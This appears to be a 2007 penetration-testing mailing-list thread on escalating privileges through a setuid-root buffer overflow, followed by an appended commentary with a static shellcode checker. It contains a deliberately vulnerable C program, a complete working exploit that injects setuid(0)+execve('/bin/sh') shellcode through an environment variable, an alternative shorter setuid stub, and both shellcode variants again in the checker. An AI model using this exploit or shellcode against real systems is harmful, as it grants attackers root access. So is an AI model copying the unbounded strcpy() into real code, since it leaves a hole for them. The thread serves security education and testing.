Penetration Testing mailing list archives
Re: question on escalating privileges via suid vulnerabilities
From: "John McGuire" <jmcguire81 () gmail com>
Date: Wed, 28 Feb 2007 12:20:43 -0700
Here is the assembly I finally came up with for this. It shaves off a byte if space is critical:

// setuid(0), opcode 17
"\x31\xdb"      // xorl %ebx,%ebx
"\x8d\x43\x17"  // leal 0x17(%ebx),%eax   // eax = ebx + 0x17
"\xcd\x80"      // int $0x80

John

On 2/27/07, Fábio Russo <fabio.contin.russo () gmail com> wrote:
> Try with "setuid(0);" before execve :-)
> --
> Andrea "bunker" Purificato
> +++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
> ++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.
>
> http://rawlab.mindcreations.com

Hi. Some applications need a setuid(0) before the /bin/sh string because they have the suid bit set. See the example below:

// bugged program with setuid bit set and root privileges:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    char env[96];

    // Shows the return address for exploiting
    printf("- %p -\n", &env);
    strcpy(env, getenv("BOLINHA"));   // unbounded copy from the environment: the overflow
    return 0;
}

// exploit: usage ./exploit <bugged_program> <return addr>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"                                   // setuid(0)
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
    "\xe8\xdc\xff\xff\xff/bin/sh";                                       // execve("/bin/sh"), exit()

int main(int argc, char **argv)
{
    char string_longa[128 + 1];                 // +1 so setenv() sees a terminated string
    uint32_t *ptr = (uint32_t *) string_longa;  // 32-bit target: one return address per 4 bytes
    int i;

    if (argc < 3) {
        fprintf(stderr, "usage: %s <bugged_program> <return addr>\n", argv[0]);
        return 1;
    }

    // fill the whole buffer with the return address...
    for (i = 0; i < 32; i++)
        *(ptr + i) = (uint32_t) strtoul(argv[2], NULL, 16);
    // ...then put the shellcode at the start
    for (i = 0; i < (int) strlen(shellcode); i++)
        string_longa[i] = shellcode[i];
    string_longa[128] = '\0';

    setenv("BOLINHA", string_longa, 1);
    execle(argv[1], argv[1], NULL, environ);
    printf("%s\n", string_longa);               // only reached if execle() fails
    return 0;
}

Taking a close look at the exploit source code, we can see that the first bytes in the shellcode are the setuid(0), more precisely \x31\xc0\x31\xdb\xb0\x17\xcd\x80. This is needed to get a root shell. If you cut those bytes off the shellcode, you will get a shell that belongs to the user who executed the exploit.

I hope it can be useful for someone. -: )

bye.

------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------
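The thread swaps one setuid(0) stub for a shorter one in front of a jmp/call execve payload, and says that cutting the stub off still gives a shell, just not a root one. The following is an added example, not code from the thread or from either poster, that checks statically what a practitioner would want to confirm before relying on such an edit: that the payload contains no NUL byte (strcpy() would truncate it), that the short jmp really lands on the call and the call really lands on pop %esi, that the address the call pushes is the "/bin/sh" string, and that the bytes in front of the jmp are one of the two setuid(0) encodings from the thread. It never executes the payload. The names sc_check(), sc_prefix_is_setuid0(), sc_layout, sc_long and sc_short are this example's own; sc_long is the shellcode exactly as posted, sc_short the same bytes with the 7-byte prefix substituted.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x86-32 opcodes the layout check needs to recognise */
#define OP_JMP_REL8   0xeb   /* jmp  rel8   */
#define OP_CALL_REL32 0xe8   /* call rel32  */
#define OP_POP_ESI    0x5e   /* pop  %esi   */

/* The exploit's shellcode as posted above: 8-byte setuid(0) stub, then execve. */
static const unsigned char sc_long[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
    "\xe8\xdc\xff\xff\xff/bin/sh";

/* Same payload with the 7-byte stub from the reply swapped in (this example's own edit). */
static const unsigned char sc_short[] =
    "\x31\xdb\x8d\x43\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
    "\xe8\xdc\xff\xff\xff/bin/sh";

/* length as strlen() sees it: the literal's own terminating NUL excluded */
#define SC_LEN(a) (sizeof (a) - 1)

struct sc_layout {
    size_t prefix_len;  /* bytes before the jmp: the setuid(0) stub, if any   */
    size_t call_at;     /* where the jmp lands: must be the call              */
    size_t pop_at;      /* where the call lands: must be pop %esi             */
    size_t str_at;      /* address the call pushes: must be "/bin/sh"         */
};

/* Decode the jmp/call pair and check the strcpy() constraints.
 * Returns 1 when every check passes (and fills *out), 0 otherwise. */
int sc_check(const unsigned char *sc, size_t len, struct sc_layout *out)
{
    struct sc_layout l;
    size_t i;
    int32_t rel32;
    long t;

    /* 1. a NUL anywhere would cut the payload short in strcpy() */
    for (i = 0; i < len; i++)
        if (sc[i] == 0) return 0;

    /* 2. the first short jmp marks the end of the prefix */
    for (i = 0; i + 1 < len && sc[i] != OP_JMP_REL8; i++)
        ;
    if (i + 1 >= len) return 0;
    l.prefix_len = i;

    /* 3. jmp rel8: target = next instruction + sign-extended displacement */
    t = (long)(i + 2) + (int8_t)sc[i + 1];
    if (t < 0 || (size_t)t + 5 > len || sc[t] != OP_CALL_REL32) return 0;
    l.call_at = (size_t)t;

    /* 4. call rel32, little-endian, relative to the end of the call */
    rel32 = (int32_t)((uint32_t)sc[l.call_at + 1]
                    | (uint32_t)sc[l.call_at + 2] << 8
                    | (uint32_t)sc[l.call_at + 3] << 16
                    | (uint32_t)sc[l.call_at + 4] << 24);
    t = (long)(l.call_at + 5) + rel32;
    if (t < 0 || (size_t)t >= len || sc[t] != OP_POP_ESI) return 0;
    l.pop_at = (size_t)t;

    /* 5. the call pushes the address of what follows it: the "/bin/sh" string */
    l.str_at = l.call_at + 5;
    if (len - l.str_at != 7 || memcmp(sc + l.str_at, "/bin/sh", 7) != 0)
        return 0;

    if (out) *out = l;
    return 1;
}

/* Is the prefix one of the two setuid(0) encodings from the thread?
 *   31 c0 31 db b0 17 cd 80   xorl %eax,%eax; xorl %ebx,%ebx; movb $0x17,%al; int $0x80
 *   31 db 8d 43 17 cd 80      xorl %ebx,%ebx; leal 0x17(%ebx),%eax;           int $0x80
 * Both reach int $0x80 with eax = 0x17 (setuid) and ebx = 0 (the uid). */
int sc_prefix_is_setuid0(const unsigned char *sc, size_t prefix_len)
{
    static const unsigned char with_mov[] = {0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80};
    static const unsigned char with_lea[] = {0x31,0xdb,0x8d,0x43,0x17,0xcd,0x80};
    return (prefix_len == sizeof with_mov && memcmp(sc, with_mov, prefix_len) == 0)
        || (prefix_len == sizeof with_lea && memcmp(sc, with_lea, prefix_len) == 0);
}

int main(void)
{
    const struct { const char *name; const unsigned char *sc; size_t len; } v[] = {
        { "8-byte prefix", sc_long,  SC_LEN(sc_long)  },
        { "7-byte prefix", sc_short, SC_LEN(sc_short) },
    };
    size_t k;
    for (k = 0; k < 2; k++) {
        struct sc_layout l;
        int ok = sc_check(v[k].sc, v[k].len, &l);
        printf("%s: %zu bytes, layout %s", v[k].name, v[k].len, ok ? "ok" : "BROKEN");
        if (ok)
            printf(", setuid(0) stub %s, jmp -> %zu, call -> %zu, \"/bin/sh\" at %zu",
                   sc_prefix_is_setuid0(v[k].sc, l.prefix_len) ? "yes" : "no",
                   l.call_at, l.pop_at, l.str_at);
        putchar('\n');
    }
    return 0;
}
```

Because both branches are relative and sit entirely inside the execve part, shortening or removing the prefix shifts every offset by the same amount and leaves the payload intact; that is why the stub can be swapped (or dropped, at the cost of root) without re-encoding anything else. The check is the kind of thing to run after any hand edit to a byte string, since a single miscounted displacement gives a crash rather than a shell.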